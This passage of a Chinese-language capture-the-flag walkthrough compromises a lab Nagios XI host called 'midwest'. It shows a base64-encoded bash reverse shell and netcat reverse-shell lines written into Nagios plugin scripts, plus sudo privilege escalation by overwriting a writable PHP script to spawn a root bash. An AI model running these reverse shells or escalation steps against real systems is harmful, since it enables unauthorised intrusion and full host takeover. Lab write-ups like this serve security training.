-rwxrwxr-x 1 www-data nagios 10440 Jan 22 2021 check_smtp_send_epn
-rwxrwxr-x 1 www-data nagios 262376 Jan 22 2021 check_snmp
-rwxrwxr-x 1 www-data nagios 10983 Jan 22 2021 check_snmp_boostedge.pl
-rwxrwxr-x 1 www-data nagios 17866 Jan 22 2021 check_snmp_cpfw.pl
-rwxrwxr-x 1 www-data nagios 16834 Jan 22 2021 check_snmp_css.pl
-rwxrwxr-x 1 www-data nagios 8763 Jan 22 2021 check_snmp_css_main.pl
-rwxrwxr-x 1 www-data nagios 33722 Jan 22 2021 check_snmp_env.pl
-rwxrwxr-x 1 www-data nagios 23464 Jan 22 2021 check_snmp_generic.pl
-rwxrwxr-x 1 www-data nagios 31919 Jan 22 2021 check_snmp_int.pl
-rwxrwxr-x 1 www-data nagios 10140 Jan 22 2021 check_snmp_linkproof_nhr.pl
-rwxrwxr-x 1 www-data nagios 22931 Jan 22 2021 check_snmp_load.pl
-rwxrwxr-x 1 www-data nagios 23980 Jan 22 2021 check_snmp_load_wizard.pl
-rwxrwxr-x 1 www-data nagios 18782 Jan 22 2021 check_snmp_mem.pl
-rwxrwxr-x 1 www-data nagios 11930 Jan 22 2021 check_snmp_nsbox.pl
-rwxrwxr-x 1 www-data nagios 26296 Jan 22 2021 check_snmp_process.pl
-rwxrwxr-x 1 www-data nagios 26297 Jan 22 2021 check_snmp_process_wizard.pl
-rwxrwxr-x 1 www-data nagios 25538 Jan 22 2021 check_snmp_storage.pl
-rwxrwxr-x 1 www-data nagios 25539 Jan 22 2021 check_snmp_storage_wizard.pl
-rwxrwxr-x 1 www-data nagios 14521 Jan 22 2021 check_snmp_vrrp.pl
-rwxrwxr-x 1 www-data nagios 13120 Jan 22 2021 check_snmp_win.pl
lrwxrwxrwx 1 www-data nagios 9 Jan 22 2021 check_spop -> check_tcp
-rwxrwxr-x 1 www-data nagios 182984 Jan 22 2021 check_ssh
-rwxrwxr-x 1 www-data nagios 12544 Jan 22 2021 check_ssl_validity
lrwxrwxrwx 1 www-data nagios 9 Jan 22 2021 check_ssmtp -> check_tcp
-rwxrwxr-x 1 www-data nagios 166896 Jan 22 2021 check_swap
-rwxrwxr-x 1 www-data nagios 237152 Jan 22 2021 check_tcp
-rwxrwxr-x 1 www-data nagios 22015 Jan 22 2021 check_tftp.sh
-rwxrwxr-x 1 www-data nagios 182984 Jan 22 2021 check_time
lrwxrwxrwx 1 www-data nagios 9 Jan 22 2021 check_udp -> check_tcp
-rwxrwxr-x 1 www-data nagios 195808 Jan 22 2021 check_ups
-rwxrwxr-x 1 www-data nagios 157080 Jan 22 2021 check_uptime
-rwxrwxr-x 1 www-data nagios 151672 Jan 22 2021 check_users
-rwxrwxr-x 1 www-data nagios 170370 Jan 22 2021 check_vmware_api.pl
-rwxrwxr-x 1 www-data nagios 3270 Jan 22 2021 check_wave
-rwxrwxr-x 1 www-data nagios 314 Jan 22 2021 check_webinject.sh
-rwxrwxr-x 1 www-data nagios 7065 Jan 22 2021 check_win_snmp_disk.pl
-rwxrwxr-x 1 www-data nagios 368 Jan 22 2021 check_wlsagent.sh
-rwxrwxr-x 1 www-data nagios 5885 Jan 22 2021 check_wmi_plus.conf
-rwxrwxr-x 1 www-data nagios 66087 Jan 22 2021 check_wmi_plus.ini
-rwxrwxr-x 1 www-data nagios 326028 Jan 22 2021 check_wmi_plus.pl
-rwxrwxr-x 1 www-data nagios 48666 Jan 22 2021 check_wmi_plus_help.pl
-rwxrwxr-x 1 www-data nagios 56523 Jan 22 2021 check_xi_sla.php
-rwxrwxr-x 1 www-data nagios 7778 Jan 22 2021 check_xml.php
-rwxrwxr-x 1 www-data nagios 710 Jan 22 2021 check_yum
-rwxrwxr-x 1 www-data nagios 3435 Jan 22 2021 custom_check_mem
-rwxrwxr-x 1 www-data nagios 915 Jan 22 2021 custom_check_procs
-rwxrwxr-x 1 www-data nagios 40695 Jan 22 2021 folder_watch.pl
-rwxrwxr-x 1 www-data nagios 146632 Jan 22 2021 negate
-rwxrwxr-x 1 www-data nagios 42803 Jan 22 2021 process_perfdata.pl
-rwxrwxr-x 1 www-data nagios 136576 Jan 22 2021 remove_perfdata
-rwxrwxr-x 1 www-data nagios 86264 Jan 22 2021 send_nsca
-rwxrwxr-x 1 www-data nagios 133280 Jan 22 2021 urlize
-rwxrwxr-x 1 www-data nagios 1914 Jan 22 2021 utils.pm
-rwxrwxr-x 1 www-data nagios 2791 Jan 22 2021 utils.sh
$
这里边看到了不一样的东西
-rwxr-xr-x 1 www-data nagios 8 Jan 22 2021 ;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTM0LzQ0NDQ0IDA+JjE= | base64 -d | bash;#
-rwxr-xr-x 1 www-data nagios 8 Jan 22 2021 ;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMjM0LzQ0NDQ0IDA+JjE= | base64 -d | bash;#
解密后发现
┌──(hirak0㉿MYsec)-[~/Vulhub/107]
└─$ echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTM0LzQ0NDQ0IDA+JjE= | base64 -d
bash -i >& /dev/tcp/192.168.1.134/44444 0>&1
这是不是说明,得利用该文件夹内的程序做反弹shell呢?
拿一个试试,就拿第一个程序check_apt
echo "nohup nc -e /bin/bash 192.168.11.130 8888&" > check_apt
失败了,好像不太行
再去配置文件中找找
$ cd services
$ ls
localhost.cfg
$ cat localhost.cfg
###############################################################################
#
# Services configuration file
#
# Created by: Nagios CCM 3.0.8
# Date: 2021-01-22 18:07:40
# Version: Nagios Core 4.x
#
# --- DO NOT EDIT THIS FILE BY HAND ---
# Nagios CCM will overwrite all manual settings during the next update if you
# would like to edit files manually, place them in the 'static' directory or
# import your configs into the CCM by placing them in the 'import' directory.
#
###############################################################################
define service {
host_name localhost
service_description Current Load
use local-service
check_command check_local_load!5.0,4.0,3.0!10.0,6.0,4.0
register 1
}
define service {
host_name localhost
service_description Current Users
use local-service
check_command check_local_users!20!50
register 1
}
define service {
host_name localhost
service_description HTTP
use local-service
check_command check_http
register 1
}
define service {
host_name localhost
service_description Memory Usage
use local-service
check_command check_local_mem!30!20
register 1
}
define service {
host_name localhost
service_description PING
use local-service
check_command check_ping!100.0,20%!500.0,60%
register 1
}
define service {
host_name localhost
service_description Root Partition
use local-service
check_command check_local_disk!20%!10%!/
register 1
}
define service {
host_name localhost
service_description Service Status - crond
use local-service
check_command check_xi_service_status!crond!!!!!!
register 1
}
define service {
host_name localhost
service_description Service Status - httpd
use local-service
check_command check_xi_service_status!httpd!!!!!!
register 1
}
define service {
host_name localhost
service_description Service Status - mysqld
use local-service
check_command check_xi_service_status!mysqld!!!!!!
register 1
}
define service {
host_name localhost
service_description SSH
use local-service
check_command check_ssh
register 1
}
define service {
host_name localhost
service_description Swap Usage
use local-service
check_command check_local_swap!50%!30%
register 1
}
define service {
host_name localhost
service_description Total Processes
use local-service
check_command check_local_procs!400!500!RSZDT
register 1
}
###############################################################################
#
# Services configuration file
#
# END OF FILE
#
###############################################################################
$
是不是这里的这些命令呢?
echo "nohup nc -e /bin/bash 192.168.11.130 8888&" > check_local_load
echo "nohup nc -e /bin/bash 192.168.11.130 8888&" > check_local_users
echo "nohup nc -e /bin/bash 192.168.11.130 8888&" > check_http
echo "nohup nc -e /bin/bash 192.168.11.130 8888&" > check_local_mem
echo "nohup nc -e /bin/bash 192.168.11.130 8888&" > check_ping
echo "nohup nc -e /bin/bash 192.168.11.130 8888&" > check_local_disk
echo "nohup nc -e /bin/bash 192.168.11.130 8888&" > check_xi_service_status
echo "nohup nc -e /bin/bash 192.168.11.130 8888&" > check_ssh
echo "nohup nc -e /bin/bash 192.168.11.130 8888&" > check_local_swap
echo "nohup nc -e /bin/bash 192.168.11.130 8888&" > check_local_procs
都失败了,回头看一下commands.cfg与这个localhost.cfg文件
发现了不一样的地方custom_check_mem与custom_check_procs
其他的命令对应程序都是check_*,唯独这两个不一样
感觉是要利用这两个程序,试一下
echo "nohup nc -e /bin/bash 192.168.11.130 8888&" > custom_check_mem
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/107]
└─# nc -lvvp 8888
listening on [any] 8888 ...
connect to [192.168.11.130] from www.midwest.htb [192.168.11.139] 49118
id
uid=1001(nagios) gid=1001(nagios) groups=1001(nagios),1002(nagcmd)
成功了,既然这个程序可以,再试试另外一个程序
echo "nohup nc -e /bin/bash 192.168.11.130 9999&" > custom_check_procs
等了会还是没反弹成功,回头看了下配置发现
check_local_mem!30!20是用作check_command的值。这意味着当执行与 "Memory Usage" 相关的服务检查时,将使用check_local_mem命令,并传递参数30和20
check_local_procs!400!500!RSZDT是用作check_command的值。这意味着当执行与 "Total Processes" 相关的服务检查时,将使用check_local_procs命令,并传递参数400、500和RSZDT,只有这样的时候才会调用这个程序
id
uid=1001(nagios) gid=1001(nagios) groups=1001(nagios),1002(nagcmd)
ls
memcalc
systemd-private-f83418e689294ca9be7a9608277a73be-apache2.service-CHkRzU
systemd-private-f83418e689294ca9be7a9608277a73be-ntp.service-QWfPy1
cd /home
ls
nagios
cd nagios
ls
user.txt
cat user.txt
7ec306b6fa01510ffc4e0d0fac97c23e
成功拿到flag-user
2.3.2 提权root
先升级一下tty
python3 -c 'import pty;pty.spawn("/bin/bash")'
sudo -l
python3 -c 'import pty;pty.spawn("/bin/bash")'
nagios@midwest:/home/nagios$
nagios@midwest:/home/nagios$ sudo -l
sudo -l
Matching Defaults entries for nagios on midwest:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User nagios may run the following commands on midwest:
(root) NOPASSWD: /etc/init.d/nagios start
(root) NOPASSWD: /etc/init.d/nagios stop
(root) NOPASSWD: /etc/init.d/nagios restart
(root) NOPASSWD: /etc/init.d/nagios reload
(root) NOPASSWD: /etc/init.d/nagios status
(root) NOPASSWD: /etc/init.d/nagios checkconfig
(root) NOPASSWD: /etc/init.d/npcd start
(root) NOPASSWD: /etc/init.d/npcd stop
(root) NOPASSWD: /etc/init.d/npcd restart
(root) NOPASSWD: /etc/init.d/npcd reload
(root) NOPASSWD: /etc/init.d/npcd status
(root) NOPASSWD: /usr/bin/php
/usr/local/nagiosxi/scripts/components/autodiscover_new.php *
(root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_latest.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/change_timezone.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_config.sh *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh *
nagios@midwest:/home/nagios$
发现好多程序都无密码可使用root权限,先看看php的那些程序有哪些可写入的
nagios@midwest:/home/nagios$ ls -al /usr/local/nagiosxi/scripts/components/autodiscover_new.php
<al/nagiosxi/scripts/components/autodiscover_new.php
-r-xr-x--- 1 root nagios 232753 Jan 22 2021 /usr/local/nagiosxi/scripts/components/autodiscover_new.php
nagios@midwest:/home/nagios$ ls -al /usr/local/nagiosxi/scripts/send_to_nls.php
< ls -al /usr/local/nagiosxi/scripts/send_to_nls.php
-rwxr-xr-x 1 nagios nagios 1534 Jan 22 2021 /usr/local/nagiosxi/scripts/send_to_nls.php
nagios@midwest:/home/nagios$
发现/usr/local/nagiosxi/scripts/send_to_nls.php可以写
nagios@midwest:/home/nagios$ printf "<?php \n system('/bin/bash') \n?>" > /usr/local/nagiosxi/scripts/send_to_nls.php
<\n?>" > /usr/local/nagiosxi/scripts/send_to_nls.php
nagios@midwest:/home/nagios$ sudo /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
<n/php /usr/local/nagiosxi/scripts/send_to_nls.php *
root@midwest:/home/nagios# cd /root
cd /root
root@midwest:~# ls
ls
root.txt
root@midwest:~# cat root.txt
cat root.txt
0d599f0ec05c3bda8c3b8a68c32a1b47
root@midwest:~#
成功提权并拿到flag-root
三、总结
这个靶机的WP常规手法利用,nagios的用户爆破的手法为cewl+john制作字典,然后再用hydra爆破,而nagios这块手法就是将反弹shell写入内置程序,通过内置程序执行反弹shell从而getshell,root提权这块儿注意利用php编译器运行对应具有root权限的代码调用执行/bin/bash进行提权.
- WordPress插件上传利用
cewl+john制作字典hydra爆破php提权
